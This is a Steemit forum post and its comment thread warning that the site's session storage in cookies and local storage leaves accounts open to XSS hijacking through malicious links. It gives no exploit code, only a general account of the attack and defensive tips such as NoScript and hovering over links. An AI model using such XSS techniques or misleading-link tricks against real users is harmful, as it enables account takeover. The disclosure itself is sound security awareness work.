[SECURITY BUG] Steemit vulerable to session hijacking

steve-walschot (68)in #steem • 8 years ago

This bug could affect all users on Steemit!

Why?

Steemit uses your local storage and cookies to save your session. No additional security has been provided.

How?

Any malicious URL pasted here could lead to session hijacking when reading your local storage and cookie contents. This is also known as XSS attacks. You'll never notice it happened, but the consequenses could be severe and resulting in a hijacked account.

How can i test this?

I wont reveal to much information in this post to prevent intentional XSS attacking. However, if you have a basic knowledge on Javascript, you'll be able to replicate the issue on your local machine.

If your knowledge on Javascript is zero, then do some google searching on XSS attacks.

OMG! Did you report this already?

The issue has been reported, along with a fix proposal to prevent this from happening.

Now what? Is my account in danger?

Your account is safe as long as you play by the rules of internet.

Please, don't ever - for real! - click on a URL without knowing where it will lead you.

XSS hijacking is only one of many evil things that could happen to you when clicking random links.

#steemit #security #trending #beware #thehack #hack

8 years ago in #steem by steve-walschot (68)

$513.06

Sort:

Trending

[-]

nicetea (51) 8 years ago

Also don't trust short urls.
To prevent XSS attacks you can use an addon like NoScript.

$22.60

9 votes

[-]

steve-walschot (68) 8 years ago

Never trust any URL. For example:

https://steemit.com/market / https://www.google.com

will lead you to google when you click it, even thinking it will lead you to the market.

Basic things, like hovering over the URL before clicking, thus displaying the true website you'll be visiting should prevent misleading evil URL's.

$21.92

11 votes

[-]

cogliostro (49) 8 years ago

That's pretty severe. I've played with XSS exploits before and it's relatively easy to craft an attack along this vector even for a non-professional dabbler.

How involved/difficult is the proposed fix? Think we would all sleep a little better knowing nasty shit like that is taken care of on the platform.

BTW, in the meantime until this is fixed, one way to protect yourself from the exploit is to make sure your internet browser is set to never remember your Steem password, and the "keep me logged in" function is turned off.

$0.31

5 votes

[-]

thebluepanda (66) 8 years ago

I already did this (not save my pass in GOogle browser). I am not even using Steem mobile app (I have android) just i would need to save the pass in it. arghh

$0.00

1 vote

[-]

ionlysaymeep (50) 8 years ago

meep

$0.00

1 vote

[-]

liondani (69) 8 years ago (edited)

Any malicious URL pasted here could lead to session hijacking when reading your local storage and cookie contents. This is also known as XSS attacks. You'll never notice it happened, but the consequenses could be severe and resulting in a hijacked account.

It already happened about 2 weeks ago!

https://steemit.com/steemit/@steemitblog/important-security-announcement-steemit-ceo-ned-scott

https://cointelegraph.com/news/steemit-website-hacked-ceo-promises-to-reset-accounts-in-48-hours

https://news.bitcoin.com/steemit-hacked-weak-security/

$0.00

[-]